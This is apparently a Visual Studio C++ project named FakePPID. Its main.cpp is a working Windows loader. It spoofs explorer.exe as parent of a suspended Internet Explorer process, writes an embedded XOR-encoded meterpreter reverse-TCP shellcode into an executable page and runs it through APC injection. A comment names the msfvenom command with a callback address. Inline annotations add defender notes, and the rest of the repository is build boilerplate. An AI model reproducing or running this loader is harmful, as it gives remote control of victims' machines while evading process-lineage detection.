├── .gitattributes
├── .gitignore
├── FakePPID.sln
└── FakePPID
├── FakePPID.vcxproj
├── FakePPID.vcxproj.filters
└── main.cpp
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is needed for earlier builds of msysgit that do not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to check in your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary; however, it will generally be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produce more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
227 | # Including strong name files can present a security risk
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
--------------------------------------------------------------------------------
/FakePPID.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29709.97
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FakePPID", "FakePPID\FakePPID.vcxproj", "{3523C906-A136-4599-8936-C0C32D872ECC}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {3523C906-A136-4599-8936-C0C32D872ECC}.Debug|x64.ActiveCfg = Debug|x64
17 | {3523C906-A136-4599-8936-C0C32D872ECC}.Debug|x64.Build.0 = Debug|x64
18 | {3523C906-A136-4599-8936-C0C32D872ECC}.Debug|x86.ActiveCfg = Debug|Win32
19 | {3523C906-A136-4599-8936-C0C32D872ECC}.Debug|x86.Build.0 = Debug|Win32
20 | {3523C906-A136-4599-8936-C0C32D872ECC}.Release|x64.ActiveCfg = Release|x64
21 | {3523C906-A136-4599-8936-C0C32D872ECC}.Release|x64.Build.0 = Release|x64
22 | {3523C906-A136-4599-8936-C0C32D872ECC}.Release|x86.ActiveCfg = Release|Win32
23 | {3523C906-A136-4599-8936-C0C32D872ECC}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {88D2688F-D239-4F45-8CBD-9DDC86A9AD3A}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/FakePPID/FakePPID.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {3523C906-A136-4599-8936-C0C32D872ECC}
24 | FakePPID
25 | 10.0
26 |
27 |
28 |
29 | Application
30 | true
31 | v142
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v142
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v142
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v142
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 | Level3
87 | true
88 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
89 | true
90 |
91 |
92 | Console
93 | true
94 |
95 |
96 |
97 |
98 | Level3
99 | true
100 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
101 | true
102 | MultiThreaded
103 |
104 |
105 | Console
106 | true
107 |
108 |
109 |
110 |
111 | Level3
112 | true
113 | true
114 | true
115 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
116 | true
117 |
118 |
119 | Console
120 | true
121 | true
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 | MultiThreaded
134 |
135 |
136 | Console
137 | true
138 | true
139 | true
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
--------------------------------------------------------------------------------
/FakePPID/FakePPID.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 |
--------------------------------------------------------------------------------
/FakePPID/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 |
// Returns the PID of the first process in a Toolhelp snapshot whose image name
// is "explorer.exe". This lookup supplies the PID that the parent-process
// attribute in main() later points at, i.e. the process the child will report
// as its parent.
//
// Behaviour as written (no checks added here, documented for the reader):
//  - The snapshot handle is not validated. If CreateToolhelp32Snapshot fails,
//    Process32First fails too and the zero-initialised th32ProcessID (0) is
//    returned.
//  - If no entry matches, the do/while exits when Process32Next fails and the
//    PID of the *last* enumerated entry is returned rather than an error value.
6 | DWORD FindExplorerPID() {
7 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
8 | PROCESSENTRY32 process = { 0 };
9 | process.dwSize = sizeof(process); // Process32First rejects the call unless dwSize is set
10 |
11 | if (Process32First(snapshot, &process)) {
12 | do {
// Wide-string compare: the project builds with the Unicode character set
// (see the vcxproj), so PROCESSENTRY32/szExeFile resolve to the wide variant.
13 | if (!wcscmp(process.szExeFile, L"explorer.exe"))
14 | break;
15 | } while (Process32Next(snapshot, &process));
16 | }
17 |
18 | CloseHandle(snapshot);
19 | return process.th32ProcessID;
20 | }
21 |
// Entry point. Sequence as written: locate explorer.exe, create a suspended
// child whose recorded parent is explorer.exe (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS),
// copy the embedded byte array into that child, queue it as an APC on the
// child's primary thread and resume it.
//
// Defender notes: the child's recorded parent PID differs from the process that
// actually called CreateProcessA, so telemetry that records the creating process
// separately from the parent can flag the mismatch. A remote
// PAGE_EXECUTE_READWRITE allocation followed by WriteProcessMemory and
// QueueUserAPC against a thread created suspended is a commonly monitored
// injection sequence. No API return value in this function is checked.
22 | int main() {
23 |
24 | //msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor_dynamic -i 14 LHOST=192.168.0.109 EXITFUNC=thread -f
// Byte array embedded verbatim; the comment above identifies its generator.
// Because it is initialised from a string literal, sizeof(shellcode) also
// counts the trailing NUL terminator.
25 | unsigned char shellcode[] = ("\xeb\x27\x5b\x53\x5f\xb0\x74\xfc\xae\x75\xfd\x57\x59\x53\x5e"
26 | "\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\x32\x3a"
27 | "\x74\x07\x80\x3e\x74\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
28 | "\xff\x3c\x03\x1a\x74\xd7\x24\x41\x6f\x5c\xaa\x3e\xff\xb4\x49"
29 | "\xfe\x4d\x65\x50\x44\xb6\x05\x2a\x3b\x4b\xe5\xfb\x4b\xe5\xfa"
30 | "\x65\x9b\x03\x46\x25\x48\x04\x9a\x02\x01\x6f\xd6\xe8\xfc\xc3"
31 | "\xe2\xf2\xe8\xfc\xe5\xc3\x19\x26\x3f\x01\xeb\x27\x5b\x53\x5f"
32 | "\xb0\x2f\xfc\xae\x75\xfd\x57\x59\x53\x5e\x8a\x06\x30\x07\x48"
33 | "\xff\xc7\x48\xff\xc6\x66\x81\x3f\xc8\x05\x74\x07\x80\x3e\x2f"
34 | "\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff\xff\x03\x1a\x0b\x2f"
35 | "\xe8\x3d\x50\x50\x45\xbb\xb5\xe6\xa5\x76\xe7\x5c\x5a\x49\x55"
36 | "\x89\x1c\x3b\x04\x52\xf4\xc4\x52\xf4\xc5\x7c\x8a\x3c\xf7\x5e"
37 | "\x77\x1d\x8b\x3d\xac\x7e\xe9\xf1\xed\xfc\xfb\xe3\xd7\xe5\xf4"
38 | "\xfc\x2d\x08\x19\xac\xd7\x27\x5b\x6f\x5f\xb0\x51\xfc\xae\x49"
39 | "\xfd\x57\x65\x53\x5e\xb6\x06\x30\x3b\x48\xff\xfb\x48\xff\xfa"
40 | "\x66\x81\x03\xf5\xa8\x48\x07\x80\x02\x6d\x75\xd6\xeb\xe6\xc3"
41 | "\xe1\xe8\xe8\xff\xff\xc3\x1a\x0e\x3f\x6d\xf1\x15\x58\x49\x6d"
42 | "\xb3\x6c\xce\xad\x6f\xcf\x54\x43\x61\x5d\x90\x34\x33\x1d\x7a"
43 | "\xfc\xdd\x7a\xfc\xdc\x54\x82\x25\xaa\xb2\x6e\x35\x83\x24\x44"
44 | "\x76\xf0\xd9\xe5\xe5\xd3\xeb\xce\xcd\xfc\xe5\x23\x20\x0b\x44"
45 | "\xf9\x1e\x78\x41\x66\x93\x17\xc5\x8d\x67\xc4\x74\x4b\x6a\x7d"
46 | "\x98\x3f\x13\x15\x71\xdc\xd5\x71\xdc\xd4\x5f\xa2\x2d\xca\x1d"
47 | "\x66\x3e\xa3\x2c\x3c\x56\xf8\xd2\xc5\xed\xd8\xcb\xc6\xc6\xdc"
48 | "\xed\x37\x22\x17\xdc\x05\x47\x6b\x72\xa3\x31\xde\xb2\x4d\xd0"
49 | "\x44\x6e\x71\x42\xb2\x2b\x23\x30\x6a\xe3\xff\x65\xec\xf1\x44"
50 | "\x9d\x07\xd3\xd7\x43\x25\x9c\x06\x2b\x66\xdd\xc9\xfa\xc7\xcc"
51 | "\xfb\xe3\xdd\xe3\xc7\x2c\x1d\x31\xc8\x35\x62\x70\x4d\x89\xc6"
52 | "\xee\x97\x56\xef\x6e\x7a\x41\x67\xa9\x14\x09\x24\x5a\xc6\xe4"
53 | "\x5a\xc6\xe5\x74\xb8\x1c\xbc\x8e\x57\x15\xb9\x1d\xf7\x4c\xc9"
54 | "\xf9\xdf\xdc\xf3\xd1\xf7\xed\xc6\xdc\x1c\x38\xc6\xf7\x1f\x76"
55 | "\x40\x68\x92\x49\xc4\x83\x66\xca\x75\x45\x6b\x73\x99\x31\x12"
56 | "\x1b\x70\xd2\xd4\x7f\xdd\xda\x5e\xac\x2c\xba\x8a\x68\x3f\xad"
57 | "\x2d\x62\x57\xf6\xd3\xcb\xec\xd6\xca\xc8\xc7\xd2\xec\x36\x2c"
58 | "\x49\xd2\x04\x49\x6a\x7c\xa2\xb4\xdf\xbc\x4c\xde\x45\x60\x70"
59 | "\x4c\xb3\x25\x22\x3e\x6b\xed\xfe\x6b\xed\xff\x45\x93\x06\x5a"
60 | "\x53\x4d\x24\x92\x07\xae\x67\xd3\xc8\xf4\xc6\xc2\xfa\xed\xdc"
61 | "\xed\xc6\x2d\x13\xb4\xc6\x34\x6c\x71\x43\x88\x17\xef\x99\x57"
62 | "\xe1\x6f\x74\x40\x69\xa8\x1a\x08\x2a\x5b\xc8\xe5\x54\xc7\xeb"
63 | "\x75\xb6\x1d\xb9\x69\x59\x14\xb7\x1c\x26\x4d\xc7\xf8\xd1\xdd"
64 | "\xfd\xd0\xf9\xec\xc8\xdd\x1d\x2a\x17\xf9\x02\x78\x5d\x66\x8f"
65 | "\x10\xd9\x8d\x7b\xc4\x68\x4b\x76\x7d\x84\x3f\x0f\x15\x6d\xdc"
66 | "\xc9\x71\xc0\xd4\x43\xa2\x31\x9b\xd8\x66\x22\xa3\x30\x3b\x4a"
67 | "\xf8\xce\xc5\xf1\xd8\xd7\xc6\xda\xdc\xf1\x1d\x3d\xdd\x26\x5c"
68 | "\x79\x42\xab\xa3\xfd\xa9\x5f\xe0\x4c\x6f\x52\x59\xa0\x1b\x2b"
69 | "\x31\x49\xf8\xed\x55\xe4\xf0\x67\x86\x15\x31\xe4\x42\x06\x87"
70 | "\x14\x88\x6e\xdc\xea\xe1\xd5\xfc\xf3\xe2\xfe\xf8\xd5\x0e\x8e"
71 | "\xd9\x5a\x97\xdd\xfe\xe0\xe9\x12\x14\x39\x4f\x59\x64\x42\x46"
72 | "\x68\x58\x40\x14\xc0\x71\x71\x85\x5a\x45\x5a\x9f\x6b\x16\x40"
73 | "\xae\x40\x34\x71\x85\x7a\x75\x5a\x1b\x8e\x44\x42\x68\x23\xdd"
74 | "\x71\x3f\xc8\x89\x2e\x75\x45\x0c\x24\x05\x53\xd5\xf0\x03\x49"
75 | "\x24\xd3\xf6\xd4\x5c\x49\x74\x5a\x9f\x6b\x2e\x83\x67\x2e\x5c"
76 | "\x38\xde\x6e\xa4\x6a\x0c\x32\x0c\x07\xa0\x60\x14\x39\x0e\x83"
77 | "\xa5\x9a\x14\x39\x0e\x40\xa0\xd2\x60\x5e\x46\x09\xf5\x42\x9f"
78 | "\x71\x16\x4c\xae\x52\x34\x70\x0f\xd8\xc6\x44\x5c\xc6\xc7\x49"
79 | "\xae\x26\x9c\x71\x0f\xde\x68\x23\xdd\x71\x3f\xc8\x89\x53\xd5"
80 | "\xf0\x03\x49\x24\xd3\x2c\xd9\x7b\xf9\x69\x11\x58\x1d\x06\x4d"
81 | "\x1c\xc3\x61\xe1\x56\x4c\xae\x52\x30\x70\x0f\xd8\x43\x53\x9f"
82 | "\x35\x46\x4c\xae\x52\x08\x70\x0f\xd8\x64\x99\x10\xb1\x46\x09"
83 | "\xf5\x53\x4c\x78\x56\x56\x7c\x48\x55\x61\x4f\x51\x64\x48\x5c"
84 | "\xba\xe2\x28\x64\x40\xeb\xd9\x56\x49\x7c\x48\x5c\xb2\x1c\xe1"
85 | "\x6e\xed\xeb\xc6\x53\x41\x9b\x65\x67\x0b\x51\x3b\x17\x12\x14"
86 | "\x78\x58\x41\xac\xf4\x5c\xb8\xe2\xa8\x24\x12\x14\x70\x87\xed"
87 | "\x6c\xae\x16\x39\x1f\x54\xe5\xba\x14\x5c\x4f\x5c\x6c\x9b\xf0"
88 | "\x75\x87\xf9\x64\xa8\x58\x4e\x28\x0f\xda\xc7\x58\xb0\xe4\x60"
89 | "\x24\x13\x14\x39\x57\x49\x9f\x3b\x94\x52\x0e\xf7\xf0\x78\x1e"
90 | "\x78\x50\x58\x75\x5f\x25\xf0\x43\x39\xe5\x5a\xeb\xf9\x46\x81"
91 | "\xe7\x5a\xeb\xf9\x46\x81\xe4\x53\xae\xd3\x01\xd7\xc5\xed\xc1"
92 | "\x71\x87\xcf\x4f\x02\x55\x61\x42\x81\xc7\x5a\x9d\xc0\x4f\xb2"
93 | "\xbc\xb7\x60\x58\xf1\xdd\xa0\xd2\x60\x33\x47\xf7\xeb\x67\xf1"
94 | "\xd1\x9d\x08\x25\x12\x5c\xba\xe2\x18\x6d\x9b\xf6\x74\x3f\xc1"
95 | "\x4f\x16\x55\x61\x46\x81\xdc\x53\xae\x3b\xd7\xc0\x7a\xed\xc1"
96 | "\xba\xf6\x08\x5b\x47\x5c\xba\xca\x28\x7b\x9b\xe2\x53\x4e\x49"
97 | "\x7c\x7a\x14\x29\x0e\x08\x64\x4a\x5c\xb0\xfc\x40\x14\xdb\x55"
98 | "\x83\x56\xac\x76\xf7\xeb\xec\x46\x81\xe6\x5b\x9d\xfe\x43\x39"
99 | "\xec\x5b\x9d\xc9\x46\x81\xff\x5a\x9d\xc0\x4f\xb2\x27\xcb\xdc"
100 | "\x66\xf1\xdd\xa6\xea\x14\x44\x26\x50\x64\x45\x4d\x51\x0e\x48"
101 | "\x25\x12\x55\x61\x64\x08\x7f\x53\xae\x32\x21\x07\x15\xed\xc1"
102 | "\x6e\x57\x49\x9f\x67\x7a\x74\x6f\xf7\xf0\x5b\xeb\xf7\xe7\x34"
103 | "\xda\xed\xeb\x71\x0f\xcb\x6d\x3b\xd2\x71\x8b\xfe\x50\xa6\x55"
104 | "\xc6\xe9\x50\x4f\x12\x4d\x82\xee\x15\x0f\x18\x55\xb0\xd4\xf7"
105 | "\xf0\x2d\xf8\xac\xde\x88\x42\x40\x62\x91\x90\x8d\xa5\xc9\xe6"
106 | "\xe1\x07\xaa\xb2\xf5\x94\xee\x4f\xc8\x05\x5f\x03\x32\x3a");
107 |
108 |
// Only StartupInfo.cb is initialised below; every other STARTUPINFOEXA field
// and all of piex are left uninitialised before being handed to CreateProcessA.
109 | STARTUPINFOEXA siex;
110 | PROCESS_INFORMATION piex;
111 | SIZE_T sizeT;
112 | siex.StartupInfo.cb = sizeof(STARTUPINFOEXA);
113 |
// Full-access handle to whatever PID FindExplorerPID() returned. The result is
// not checked, so a NULL handle would be stored in the attribute list as-is.
114 | HANDLE expHandle = OpenProcess(PROCESS_ALL_ACCESS, false, FindExplorerPID());
115 |
// Two-call pattern: the first call only reports the required size, the second
// initialises the heap-allocated list for one attribute.
116 | InitializeProcThreadAttributeList(NULL, 1, 0, &sizeT);
117 | siex.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT);
118 | InitializeProcThreadAttributeList(siex.lpAttributeList, 1, 0, &sizeT);
// This attribute is what makes the new process report explorer.exe as its
// parent instead of this process (the parent-PID spoof).
119 | UpdateProcThreadAttribute(siex.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &expHandle, sizeof(HANDLE), NULL, NULL);
120 |
121 |
// Hard-coded image path. CREATE_SUSPENDED means the primary thread has not run
// when the APC is queued below; EXTENDED_STARTUPINFO_PRESENT is required for
// lpAttributeList to be honoured. The return value is not checked: on failure
// piex is uninitialised and the calls below operate on indeterminate handles.
122 | CreateProcessA("C:\\Program Files\\internet explorer\\iexplore.exe", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, (LPSTARTUPINFOA)&siex, &piex);
123 |
// One 0x1000-byte page, readable, writable and executable at once, in the
// child; the byte array (including its NUL terminator) is copied into it.
124 | LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(piex.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
125 | WriteProcessMemory(piex.hProcess, lpBaseAddress, (LPVOID)shellcode, sizeof(shellcode), NULL);
// The remote page is queued as an APC routine on the suspended primary thread;
// presumably this relies on the thread delivering pending APCs as it starts
// after ResumeThread.
126 | QueueUserAPC((PAPCFUNC)lpBaseAddress, piex.hThread, NULL);
127 | ResumeThread(piex.hThread);
// Only the thread handle is closed. hProcess, expHandle and the attribute list
// (DeleteProcThreadAttributeList / HeapFree) are never released before return.
128 | CloseHandle(piex.hThread);
129 |
130 | return 0;
131 | }
--------------------------------------------------------------------------------